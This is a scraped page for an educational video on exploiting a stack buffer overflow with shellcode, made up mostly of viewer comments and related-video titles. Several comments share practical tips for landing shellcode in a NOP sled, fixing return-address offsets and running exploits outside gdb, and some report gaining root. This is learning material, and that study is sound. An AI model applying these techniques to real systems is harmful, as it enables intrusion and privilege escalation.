First Exploit! Buffer Overflow with Shellcode - bin 0x0E

Показать описание

-=[ 🔴 Stuff I use ]=-

-=[ ❤️ Support ]=-

-=[ 🐕 Social ]=-

-=[ 📄 P.S. ]=-

All links with "*" are affiliate links.
LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Programm.

#BufferOverflow #BinaryExploitation #Shellcode

Рекомендации по теме

Комментарии

This guy is one of those guys I listen to in normal speed

enesozdemir

Hahaha you just broke my brain with the NOP Slide vine and the comment: "Riiight, a NOP-Slide." It's like you injected an INT3 into my brain's stack. I can't process stuff anymore. Perfect comedic timing, Hahaha

boomfist

0:56 so do i put on two wizard's hats?

luckyluke

This episode was pretty hard for me. I always firstly watch episode and make notes, and after that I try it for myself. I had big difficulties executing shellcode outside gdb, after like 1h putting it on different positions, I had finally got it work by making more nops and picking deeper address. What a nice feeling when it finally put me in root privileges.

ChuZZZta

Just a little reminder, at 8:18 he's adding 30 as a decimal value to the address. I was wondering why I still got an 'illegal instruction' message, until I checked in dbg only to see that it added 30 as a decimal value and not as hex. This resulted in my offset being to small and not hitting in the NOPs. Using 'eip = struct.pack("I", <address> + 0x30)' resolved this issue and I got the 'Trace/breakpoint trap'. When you get your head around this stuff it's really fascinating. Thanks for the great videos!

MyTokyodrift

Implemented the exploit on the buffer and got stuck for longer than I'd like to admit. One thing I learned the hard way: Make sure that your exploit instructions don't start overwriting themselves through stack "push" shortening the noop-slide and adding more padding after the exploit instructions fixed things.
I now understand why @LiveOverflow chose to traverse the stack in the "opposite" direction. That made things considerably easier. Long noop-slide, no worries about shell-code-self-destruction and generally less space-restriction for the exploit.

Absolutely great content!

eXecue

Instructions unclear, ran out of wizard hats!

LQ

After watching this i have been discouraged to want to learn about computers. This intimidated the shit out of me, the level of understanding and knowledge you guys have is incredible!

racoonrotary

As you mentioned, the stack can be unreliable, and even though you use "unset env" in gdb, you can have some trouble.
You can use set exec-wrapper in gdb to ensure that the program run with env -i.

(gdb) set exec-wrapper /usr/bin/env -i

Thanks a lot for all your work, I'm learning a lot.

MrEzork

@10:55 you absolute legend, that's same thing has been stumping me for weeks. I tried similar commands but didn't think of putting in brackets. Thanks!

Escarii

That last 30 seconds is very tricky/clever. Thanks for including it. I would have been stuck for a long time... :)

JohnSmith-hexg

Holy crap, took me 2 tries (messed up my nop slide) but the feeling when I typed "whoami" > root was SO worth it!
Thanks man, thanks a lot.

redgek

This was a great intro to buffer overflows. It was a bit little challenging to get working on modern 64bit Linux system, but finally figured it out. It would be really cool to see an updated video on this. Keep up the good work man!

xOoOverflw

I was shocked that my left speakers stopped working after hearing your intro. Damn they are my new ones :O

drtyharry

I think I just fried my brain, this was so intense for me, but I got it working in the end, so worth!

sweet-sinner

Wow, I’ve been following your channel for quite a while and just stumbled upon this vid now. Have to say this is a great companion for my current course in x86 asm since the content ties everything I learned so far together and from a very practical POV too. Thanks for the great content as always!

aaaaanh

INFORMATION OVERFLOW

too much info and stuff happening. i will watch again few days later after doing some googling

silverzero

I like your pronunciation is very clear to understand and how you explain is awesome.

alegerminal

I had a different memory address and had to add 64 to my stack for me to get Trace/breakpoint trap to work

alexsepelenco

3:37 op code "\xCC" (INT3)
8:09 NOP sled
9:03 shellcode database
10:27 shell without input

helloworld

First Exploit! Buffer Overflow with Shellcode - bin 0x0E

First Exploit! Buffer Overflow with Shellcode - bin 0x0E

First Stack Buffer Overflow to modify Variable - bin 0x0C

how do hackers exploit buffers that are too small?

How to exploit a buffer overflow vulnerability - Practical

Writing a Simple Buffer Overflow Exploit

Running a Buffer Overflow Attack - Computerphile

How to exploit a buffer overflow vulnerability | Full Practical

Buffer Overflow 101: Ep 1 - x86 Memory Fundamentals

Exploit Exercises - Fusion - Level 0 (Remote Buffer Overflow Exploit)

Tut03-1: Writing Your First Exploit

Track 2 12 A Crash Course in Exploiting Buffer Overflows Live Demos Parker Garrison

BASIC Buffer Overflow | Ryan's CTF [13] Everyday I'm Bufferin

What was the first buffer overflow exploit?

Buffer Overflow

Craft a Buffer Overflow exploit! - Brainpan Walkthrough EP3

Buffer Overflows Made Easy (2022 Edition)

HACKED! How a Buffer Overflow Exploit works, plus Code Red!

Demo4 - Stack Overflow + Shellcode

How to exploit a buffer overflow vulnerability - Theory

How They Hack: Simple Buffer Overflow

Exploits Explained: How Log4j, Buffer Overflows and Other Exploits Work

Buffer Overflow Hacking Tutorial (Bypass Passwords)

How They Hack: Buffer Overflow & GDB Analysis - James Lyne

Binary Exploit Development Tutorial - Simple Buffer Overflow